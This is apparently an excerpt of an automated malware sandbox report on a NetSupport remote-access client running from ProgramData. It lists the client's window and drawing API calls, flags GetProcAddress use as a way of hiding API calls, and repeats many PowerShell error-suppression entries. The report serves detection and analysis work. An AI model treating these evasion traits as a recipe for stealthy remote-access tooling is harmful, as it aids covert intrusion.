Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110238A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	32_2_110238A0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110BFC50 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	32_2_110BFC50
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11023F80 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	32_2_11023F80
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11110340 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	32_2_11110340
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110CA260 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	32_2_110CA260
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110CA260 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	32_2_110CA260

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\ProgramData\netsupport\client\client32.exe

32_2_11029200

Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
